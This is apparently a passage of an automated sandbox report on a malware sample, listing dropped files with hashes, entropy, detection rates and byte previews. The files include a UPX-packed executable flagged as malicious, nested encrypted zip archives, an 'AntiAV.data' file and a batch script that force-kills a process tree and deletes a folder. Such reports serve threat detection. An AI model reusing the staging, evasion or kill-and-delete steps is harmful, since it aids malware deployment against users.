                                                                                                                                                                                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exe
                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1679360
                                                                                                                                                                                                                                                Entropy (8bit):6.278252955513617
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                                MD5:72491C7B87A7C2DD350B727444F13BB4
                                                                                                                                                                                                                                                SHA1:1E9338D56DB7DED386878EAB7BB44B8934AB1BC7
                                                                                                                                                                                                                                                SHA-256:34AD9BB80FE8BF28171E671228EB5B64A55CAA388C31CB8C0DF77C0136735891
                                                                                                                                                                                                                                                SHA-512:583D0859D29145DFC48287C5A1B459E5DB4E939624BD549FF02C61EAE8A0F31FC96A509F3E146200CDD4C93B154123E5ADFBFE01F7D172DB33968155189B5511
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........w...$...$...$.&.$...$.&.$...$...$...$.&.$%..$.&.$..$.&G$...$.&.$...$.&.$...$.&.$...$Rich...$........................PE..d.....n\.........." .........H...............................................P............`.............................................y...l...x........{...p.......................................................................................................text............................... ..`.rdata..9...........................@..@.data...............................@....pdata.......p... ..................@..@.rsrc....{.......|..................@..@.reloc...0.......2...n..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exe
                                                                                                                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):468992
                                                                                                                                                                                                                                                Entropy (8bit):6.157743912672224
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                                MD5:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                                                                SHA1:6C7EA8BBD435163AE3945CBEF30EF6B9872A4591
                                                                                                                                                                                                                                                SHA-256:344F076BB1211CB02ECA9E5ED2C0CE59BCF74CCBC749EC611538FA14ECB9AAD2
                                                                                                                                                                                                                                                SHA-512:2C7293C084D09BC2E3AE2D066DD7B331C810D9E2EECA8B236A8E87FDEB18E877B948747D3491FCAFF245816507685250BD35F984C67A43B29B0AE31ECB2BD628
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........(...{...{...{...{...{...{...{...{...{...{...{...{...{..!{...{...{...{...{...{Rich...{................PE..d.....n\.........."..........l...... .........@...........................................`.....................................................x....`..........,a...........p.......................................................... ............................text............................... ..`.rdata..............................@..@.data....,..........................@....pdata..,a.......b..................@..@.rsrc........`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):222
                                                                                                                                                                                                                                                Entropy (8bit):4.855194602218789
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                                MD5:68CECDF24AA2FD011ECE466F00EF8450
                                                                                                                                                                                                                                                SHA1:2F859046187E0D5286D0566FAC590B1836F6E1B7
                                                                                                                                                                                                                                                SHA-256:64929489DC8A0D66EA95113D4E676368EDB576EA85D23564D53346B21C202770
                                                                                                                                                                                                                                                SHA-512:471305140CF67ABAEC6927058853EF43C97BDCA763398263FB7932550D72D69B2A9668B286DF80B6B28E9DD1CBA1C44AAA436931F42CC57766EFF280FDB5477C
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Cd /d %1..Rd "%SfxVarApiPath%"..For /f "Tokens=1,2 Delims=," %%I In ('TaskList /fo CSV /nh') Do (.. If %%I==%2 (.. Set /a N+=1.. Set PID=%%~J.. )..)..If %N% EQU 1 Rd /s /q %1..If %N% GTR 1 TaskKill /pid %PID% /t /f
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2355713
                                                                                                                                                                                                                                                Entropy (8bit):5.891648193754473
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                                MD5:579A63BEBCCBACAB8F14132F9FC31B89
                                                                                                                                                                                                                                                SHA1:FCA8A51077D352741A9C1FF8A493064EF5052F27
                                                                                                                                                                                                                                                SHA-256:0AC3504D5FA0460CAE3C0FD9C4B628E1A65547A60563E6D1F006D17D5A6354B0
                                                                                                                                                                                                                                                SHA-512:4A58CA0F392187A483B9EF652B6E8B2E60D01DAA5D331549DF9F359D2C0A181E975CF9DF79552E3474B9D77F8E37A1CF23725F32D4CDBE4885E257A7625F7B1F
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:KmO6sb9bzFlO6QmlyBR3cUuBrPdmJRJBhXshklfui2fRJCiITlYNEM2EqC9x9I0qVq7CGnIhkwh6hvGvu5pkfBRaoLATG90WNTmCTDFIBTSnd7l9KiCxIUJ5zlBvrKkHZaxyJb0N052Q1AaMDCASX2cw1ZaV1bKcufYPprTSqVIRscgIruKC2MOUPLxNBR1egyVxwSbedVhVl89lRxHAMRMf16G6Ry1TTz7dOtnEaLQowPwuw8eDnR20ZOyf9yYTVcpDsiS4K2VzryfyiwiOXZDq7UaTFrtOgtVQzuNXN74O8xkfvt4Ykzxcs60WfAkGZKsYbwZWS4bPPY8cze1vDL6leHmcDUIbsBvTleZtzGhgeYGdRaUmv5ljenoBZOBDIndh9KTa7zBVHuP4jAK8C2IKaB5BgFReYTleqD0cCkhTdxbkQAMwHPuKktcCRORGmFfE37OzhnpNUtRyIHoGBwau6RcKp6vTNwIWRMkDjZaejD2NS5TCgRvcwgZcldKIAtOqIN0TXMXlnX6scNgHltMTvvwSZbBsDdCGRINZlutVfbP6joQl5sw21ICykYYYKwRfLlfpREpOzuAjwo7oC8hJ4Tv652auJh1RujdaLcIfX5oB1GDuu95ojl52qB08Lzg7nIl7yDb4k9X8rUPZ857XTGTaXkhL77wwG75hAnvfazjbPfP5GZrDYRdhe2I0zSJZuV5aaWd5Imf8Ck0w9ALkKR7xhRlclC4FnJOBuXxpdcsG9gE8tgukaoXpzf4z0CHJ0VOfBNcErBEPyoWMZfee3Vfg2NyLVPvaC6c5HNC1mZSr0SpB1RAlj2w7ST9eZL5DUYwl8p6flt6I3p7MBJrZLlY3LgBSr5F4BYYU6sebHdx0ES2Ci6J9wBw0wGLCy8SeSDS45pkrvWvTZkvW2oFTNBda3aYJyut0zJi1Chjp4xQkH1cEMWZUOy7MueiWNcfeKZqM4Gg2hr7XoLoTQXyvcXvxeOwXoXJKXvu4
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1799594
                                                                                                                                                                                                                                                Entropy (8bit):7.99773141173711
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                                MD5:5659EBA6A774F9D5322F249AD989114A
                                                                                                                                                                                                                                                SHA1:4BFB12AA98A1DC2206BAA0AC611877B815810E4C
                                                                                                                                                                                                                                                SHA-256:E04346FEE15C3F98387A3641E0BBA2E555A5A9B0200E4B9256B1B77094069AE4
                                                                                                                                                                                                                                                SHA-512:F93ABF2787B1E06CE999A0CBC67DC787B791A58F9CE20AF5587B2060D663F26BE9F648D116D9CA279AF39299EA5D38E3C86271297E47C1438102CA28FCE8EDC4
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:PK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^.*..T.-f..$k.b..#&.B.v...s.s....{.......{..|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........*(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s|&Fj..T:.m..*.J..sk..t.\K*]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y*.;ol..&_/./....3........x.%....$..=.^}.}..53.....|...|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z........H..3k..F..:....X2a.e..G..f6...}....H.V.#r.H....T.....!....~...R%xu....(^......U.{.......l..RtFDi......./..t?......6FU....;2].@...z..8..K^B/W..
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                                File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1799748
                                                                                                                                                                                                                                                Entropy (8bit):7.997729415613798
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                                MD5:5404286EC7853897B3BA00ADF824D6C1
                                                                                                                                                                                                                                                SHA1:39E543E08B34311B82F6E909E1E67E2F4AFEC551
                                                                                                                                                                                                                                                SHA-256:EC94A6666A3103BA6BE60B92E843075A2D7FE7D30FA41099C3F3B1E2A5EBA266
                                                                                                                                                                                                                                                SHA-512:C4B78298C42148D393FEEA6C3941C48DEF7C92EF0E6BAAC99144B083937D0A80D3C15BD9A0BF40DAA60919968B120D62999FA61AF320E507F7E99FBFE9B9EF30
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:PK........n..Y*C.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^.*..T.-f..$k.b..#&.B.v...s.s....{.......{..|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........*(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s|&Fj..T:.m..*.J..sk..t.\K*]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y*.;ol..&_/./....3........x.%....$..=.^}.}..53.....|...|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z........H..3k..F..:....X2a.e..G..f6...}....H.V.#r.H....T.....!....~...R%xu....(^......U.{.......l..RtFDi......./
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                                File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1799902
                                                                                                                                                                                                                                                Entropy (8bit):7.997726708945573
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                                MD5:5EB39BA3698C99891A6B6EB036CFB653
                                                                                                                                                                                                                                                SHA1:D2F1CDD59669F006A2F1AA9214AEED48BC88C06E
                                                                                                                                                                                                                                                SHA-256:E77F5E03AE140DDA27D73E1FFE43F7911E006A108CF51CBD0E05D73AA92DA7C2
                                                                                                                                                                                                                                                SHA-512:6C4CA20E88D49256ED9CABEC0D1F2B00DFCF3D1603B5C95D158D4438C9F1E58495F8DFA200DBE7F49B5B0DD57886517EB3B98C4190484548720DAD4B3DB6069E
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:PK........n..Y...rDv..Dv......file_2.zipPK........n..Y*C.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^.*..T.-f..$k.b..#&.B.v...s.s....{.......{..|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........*(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s|&Fj..T:.m..*.J..sk..t.\K*]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y*.;ol..&_/./....3........x.%....$..=.^}.}..53.....|...|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z........H..3k..F..:....X2a.e..G..f6...}....H.V.#r.H....T.....!....~...R%xu..
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                                File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1800056
                                                                                                                                                                                                                                                Entropy (8bit):7.997723543142523
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                                MD5:7187CC2643AFFAB4CA29D92251C96DEE
                                                                                                                                                                                                                                                SHA1:AB0A4DE90A14551834E12BB2C8C6B9EE517ACAF4
                                                                                                                                                                                                                                                SHA-256:C7E92A1AF295307FB92AD534E05FBA879A7CF6716F93AEFCA0EBFCB8CEE7A830
                                                                                                                                                                                                                                                SHA-512:27985D317A5C844871FFB2527D04AA50EF7442B2F00D69D5AB6BBB85CD7BE1D7057FFD3151D0896F05603677C2F7361ED021EAC921E012D74DA049EF6949E3A3
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:PK........n..Y....v...v......file_3.zipPK........n..Y...rDv..Dv......file_2.zipPK........n..Y*C.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^.*..T.-f..$k.b..#&.B.v...s.s....{.......{..|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........*(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s|&Fj..T:.m..*.J..sk..t.\K*]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y*.;ol..&_/./....3........x.%....$..=.^}.}..53.....|...|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z........H..3k..F..:....X2a.e..G..f6...}.
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                                File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1800210
                                                                                                                                                                                                                                                Entropy (8bit):7.997720745184939
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                                MD5:B7D1E04629BEC112923446FDA5391731
                                                                                                                                                                                                                                                SHA1:814055286F963DDAA5BF3019821CB8A565B56CB8
                                                                                                                                                                                                                                                SHA-256:4DA77D4EE30AD0CD56CD620F4E9DC4016244ACE015C5B4B43F8F37DD8E3A8789
                                                                                                                                                                                                                                                SHA-512:79FC3606B0FE6A1E31A2ECACC96623CAF236BF2BE692DADAB6EA8FFA4AF4231D782094A63B76631068364AC9B6A872B02F1E080636EBA40ED019C2949A8E28DB
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:PK........n..Yab..xw..xw......file_4.zipPK........n..Y....v...v......file_3.zipPK........n..Y...rDv..Dv......file_2.zipPK........n..Y*C.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^.*..T.-f..$k.b..#&.B.v...s.s....{.......{..|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........*(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s|&Fj..T:.m..*.J..sk..t.\K*]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y*.;ol..&_/./....3........x.%....$..=.^}.}..53.....|...|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z..
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                                File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1800364
                                                                                                                                                                                                                                                Entropy (8bit):7.997716835838842
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                                MD5:0DC4014FACF82AA027904C1BE1D403C1
                                                                                                                                                                                                                                                SHA1:5E6D6C020BFC2E6F24F3D237946B0103FE9B1831
                                                                                                                                                                                                                                                SHA-256:A29DDD29958C64E0AF1A848409E97401307277BB6F11777B1CFB0404A6226DE7
                                                                                                                                                                                                                                                SHA-512:CBEEAD189918657CC81E844ED9673EE8F743AED29AD9948E90AFDFBECACC9C764FBDBFB92E8C8CEB5AE47CEE52E833E386A304DB0572C7130D1A54FD9C2CC028
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:PK........n..Y..+..x...x......file_5.zipPK........n..Yab..xw..xw......file_4.zipPK........n..Y....v...v......file_3.zipPK........n..Y...rDv..Dv......file_2.zipPK........n..Y*C.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^.*..T.-f..$k.b..#&.B.v...s.s....{.......{..|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........*(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s|&Fj..T:.m..*.J..sk..t.\K*]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y*.;ol..&_/./....3........x.%....$..=.^}.}..53.....|...|-... #..Z-.b.Ej...q.u..
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):3473559
                                                                                                                                                                                                                                                Entropy (8bit):7.9992359395959935
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                                MD5:CEA368FC334A9AEC1ECFF4B15612E5B0
                                                                                                                                                                                                                                                SHA1:493D23F72731BB570D904014FFDACBBA2334CE26
                                                                                                                                                                                                                                                SHA-256:07E38CAD68B0CDBEA62F55F9BC6EE80545C2E1A39983BAA222E8AF788F028541
                                                                                                                                                                                                                                                SHA-512:BED35A1CC56F32E0109EA5A02578489682A990B5CEFA58D7CF778815254AF9849E731031E824ADBA07C86C8425DF58A1967AC84CE004C62E316A2E51A75C8748
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:PK........n..Y`.T......#.....AntiAV.data..E..@.D..C/qwg..;...mG.3H..|...$..}.`..8......lV1*..4...Cu.H.(l+{Cl.:........$+Nr....\.u.K_1N:k.'....F...... .....+.70..R.>..A..#6L.:..n..7......Y..y......v.,....=...e....fe.4.@...h..+....=.#...T....*..A..|...{A.p{.b*.|.[...Q...z.v.....iD.....W.....;...........YVL._._.F..4./g;syC.....e,.N..>t.43..p.T4?.K.....:Z.XDVS.gj.)cp..A9.7^.d.M.d.j..c:.(T<J._3-..8.,."s.'...B\.q...\..e.!..{l.\.]'.P.2}..l@^.G...{n..p..u.n.1;W..#..p.A.YD7.....,.o..z;.6T../.w..=.3K5..]............U...,r....n....(..I.....Q.o%.NF..Q.h$y.".7.tU..eVe.b.q.S4%"C..$g..iX..XQl..?Z.U.|.g....&.d..Y.|..5O...s.|..A..@.Y1F.o.o.s.'UY.AU#....D.K.....A....=t.M..L4...{.....BF.Rg.-...j..p.c..'.2....].m..w37t...Rn.r....v....W..g0E......)-.6.=v/.9...o..~.mh.U.&...5.ld4k.gG.G.S.w4G..]'.5......r..Q.U.U.9.Vv....2.>....p.s.p..e....(..}Jox.....Z..[Y..ku.....5....s.././....:...v......h.u.ZlG.>).,.(....Ye<.....3...:T:)...-).=.L.=.2F....&H7..j..\.B6.Ox.\....
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1827328
                                                                                                                                                                                                                                                Entropy (8bit):7.963282633529333
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                                MD5:83D75087C9BF6E4F07C36E550731CCDE
                                                                                                                                                                                                                                                SHA1:D5FF596961CCE5F03F842CFD8F27DDE6F124E3AE
                                                                                                                                                                                                                                                SHA-256:46DB3164BEBFFC61C201FE1E086BFFE129DDFED575E6D839DDB4F9622963FB3F
                                                                                                                                                                                                                                                SHA-512:044E1F5507E92715CE9DF8BB802E83157237A2F96F39BAC3B6A444175F1160C4D82F41A0BCECF5FEAF1C919272ED7929BAEF929A8C3F07DEECEBC44B0435164A
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 70%
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.....Pg.........."...............-...H...-....@..............................I...........`...................................................H...............H...............H...............................H.(.....H.8...........................................UPX0......-.............................UPX1..........-.....................@...UPX2..........H.....................@...4.24.UPX!.$..=g.7....Z.H......zH.I..-.3..VH.. H......................1...MZ...o"uKHcQ<.<.PE.>H..8Q.6...[.J.t..lu'.yt.r!H....y........"....9.o.m.........1ZH....g.n.....l8..0..0..!.0..|..(.(,....8.u....'~....*../.. ^.....(v...w....YR....oD.i....H.D$ ~.9..FL......\..(..<..u....I..D.I...f.AWAVVWS.eN.%0g.....x.5.2.H..>...t.H..}.9.t)L..g..f.H....>....A..Q.u.=.X..........:|...oh.?.....^......;.]uzZ..{Q.s`AF..2PQd......p..B....o...t.1.=E6...'u7.p.)<Z.,(".f....Z..a..,+.GLO,v...\=^X...
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exe
                                                                                                                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):3473725
                                                                                                                                                                                                                                                Entropy (8bit):7.999948676888215
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                                MD5:045B0A3D5BE6F10DDF19AE6D92DFDD70
                                                                                                                                                                                                                                                SHA1:0387715B6681D7097D372CD0005B664F76C933C7
                                                                                                                                                                                                                                                SHA-256:94B392E94FA47D1B9B7AE6A29527727268CC2E3484E818C23608F8835BC1104D
                                                                                                                                                                                                                                                SHA-512:58255A755531791B888FFD9B663CC678C63D5CAA932260E9546B1B10A8D54208334725C14529116B067BCF5A5E02DA85E015A3BED80092B7698A43DAB0168C7B
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:PK........n..Yd=,..5...5.....file_7.zipm..+]..E....`...._..'.....DXW|._6.Kau^.O....W.0.....fE....Q:.t`9.9"..c.... .[(2..[m{.`S.?8...w.v.{zo/a....E..L.1..<.....].@.....:...3?. k.5....H.=......0.A.,3p......_R.......[.7....j.Ba$v1AO.@q....x...u..9.k..z.p...5.....-(.b...y.........S.../..l.Q.....)....w..@...w;.;2.&Q.w.....Hn.3A.z.i..0i%A..E-7.....8....(.Z.A....k.......=.g.,......N.Yt`....)....T.....f..P.....u4ig.......B...~-7...Y]Ct.6.7..PS.Su7yx8...#.......B.3.f."....x.-u.....M.%.a.._\D.5.G....O.P....,b.;=.k[....4......SdS....gL.....X.......G...f.P....p.PS.~.P.}...X.7.+Ap.-.....^'..\.6..r.2.p.wd...dd....(..S..N..#.M....~..L..sjX...,..B.........-..R..~..A..B...MF..,.z.........lK.]<"..,...K.~..S.Z...p).......z..I..E.MG.M].....F.SY.p..1...sM7...B...l......g..V...q..p}$%iM....L...N...;.......}/Y8..&zAO&0..s.{.pR.A...Y`..Q.../n..,........z.&.k.`TU...7lv.xQ@~.'..H.S..y...n48......m....s1(.`.....,.n;j...CX.s..sN.L..q.u.G.....q.M..:..xI":Y.
                                                                                                                                                                                                                                                Process:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):3473725
                                                                                                                                                                                                                                                Entropy (8bit):7.999948676888215
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                                MD5:045B0A3D5BE6F10DDF19AE6D92DFDD70
                                                                                                                                                                                                                                                SHA1:0387715B6681D7097D372CD0005B664F76C933C7
                                                                                                                                                                                                                                                SHA-256:94B392E94FA47D1B9B7AE6A29527727268CC2E3484E818C23608F8835BC1104D
                                                                                                                                                                                                                                                SHA-512:58255A755531791B888FFD9B663CC678C63D5CAA932260E9546B1B10A8D54208334725C14529116B067BCF5A5E02DA85E015A3BED80092B7698A43DAB0168C7B
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
